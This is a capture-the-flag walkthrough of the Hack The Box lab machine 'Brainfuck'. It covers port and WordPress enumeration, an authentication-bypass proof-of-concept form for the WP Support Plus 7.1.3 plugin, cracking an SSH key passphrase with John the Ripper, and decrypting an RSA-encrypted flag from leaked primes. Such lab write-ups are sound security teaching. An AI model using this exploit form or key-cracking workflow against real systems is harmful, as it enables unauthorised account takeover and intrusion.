HTB - Brainfuck

Brainfuck

Getting Root:

Nmap

# nmap -sC -sV -p- 10.10.10.17 -oA nmap/Brainfuck.allports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 17:00 EDT
Nmap scan report for 10.10.10.17
Host is up (0.040s latency).
Not shown: 65530 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) TOP CAPA AUTH-RESP-CODE PIPELINING UIDL RESP-CODES USER
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: ID more Pre-login ENABLE have post-login SASL-IR IDLE OK LOGIN-REFERRALS AUTH=PLAINA0001 capabilities IMAP4rev1 LITERAL+ listed
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.07 seconds

Enumeration

HTTPS - Port 443

Got a few interesting things from the SSL Certificate: email: orestis@brainfuck.htb brainfuck.htb sup3rs3cr3t.brainfuck.htb

These are possible virtual hosts

Dirsearch brainfuck.htb

$ sudo /opt/dirsearch/dirsearch.py -u https://brainfuck.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -E 
[sudo] password for kali: 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 220521

Error Log: /opt/dirsearch/logs/errors-20-04-01_17-16-07.log

Target: https://brainfuck.htb

[17:16:27] Starting: 
[17:16:28] 200 -   22KB - /
[17:16:28] 301 -  194B  - /wp-content  ->  https://brainfuck.htb/wp-content/
[17:16:29] 301 -  194B  - /wp-includes  ->  https://brainfuck.htb/wp-includes/
[17:16:39] 301 -  194B  - /wp-admin  ->  https://brainfuck.htb/wp-admin/

Task Completed

WPScan

wpscan --url https://brainfuck.htb --disable-tls-checks -e                                                                                                  
_______________________________________________________________                                                                                                                               
         __          _______   _____                                                                                                                                                          
         \ \        / /  __ \ / ____|                                                                                                                                                         
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                                        
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                         
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                        
                                                                                                                                                                                              
         WordPress Security Scanner by the WPScan Team                                                                                                                                        
                         Version 3.7.11                                                                                                                                                       
       Sponsored by Automattic - https://automattic.com/                                                                                                                                      
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                                                                                                                                        
_______________________________________________________________                                                                                                                               
                                                                                                                                                                                              
[+] URL: https://brainfuck.htb/ [10.10.10.17]                                                                                                                                                 
[+] Started: Wed Apr  1 19:47:50 2020                                                                                                                                                         
                                                                                                                                                                                              
Interesting Finding(s):  

                                                                                                                                                                                              
[i] Plugin(s) Identified:                                                                                                                                                                     
                                                                                                                                                                                              
[+] wp-support-plus-responsive-ticket-system                                                                                                                                                  
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/                                                                                               
 | Last Updated: 2019-09-03T07:57:00.000Z                                                                                                                                                     
 | [!] The version is out of date, the latest version is 9.1.2                                                                                                                                
 |                                                                                                                                                                                            
 | Found By: Urls In Homepage (Passive Detection)                                                                                                                                             
 |                                                                                                                                                                                            
 | Version: 7.1.3 (100% confidence)                                                                                                                                                           
 | Found By: Readme - Stable Tag (Aggressive Detection)                                                                                                                                       
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt                                                                                            
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)                                                                                                                            
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt                                                                                            
                                                                                                        


[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Users Found: admin administrator Plugins: WP Support Plus Responsive Ticket System Ver 7.1.3

Searchsploit

searchsploit wp support plus                                  
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                       |  Path
                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities                                                             | exploits/php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation                                                               | exploits/php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                                                                      | exploits/php/webapps/40939.txt
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Using the privilege escalation POC, I made the following modification using information from previous enumeration.

2. Proof of Concept

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="orestis@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

Cracking the id_rsa key passphrase

# /usr/share/john/ssh2john.py id_rsa > ssh_key_to_crack.txt

# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt ssh_key_to_crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)
1g 0:00:00:05 DONE (2020-04-01 22:52) 0.1680g/s 2410Kp/s 2410Kc/s 2410KC/sa6_123..*7¡Vamos!
Session completed

Exploitation

# chmod 600 id_rsa 
# ssh -i id_rsa orestis@brainfuck.htb
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Wed May  3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)  
orestis@brainfuck:~$ 

Privilege Escalation

# ls
debug.txt  encrypt.sage  mail  output.txt  user.txt


# cat output.txt 
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182  

# cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997


# cat encrypt.sage 
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

Root

Running this script gets the clear text which is the flag.

from Crypto.Util.number import *

p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
n = p * q
phin = (p-1)*(q-1)
d = inverse(e,phin)
pt = pow(ct,d,n)
print(hex(pt)[2:-1].decode('hex'))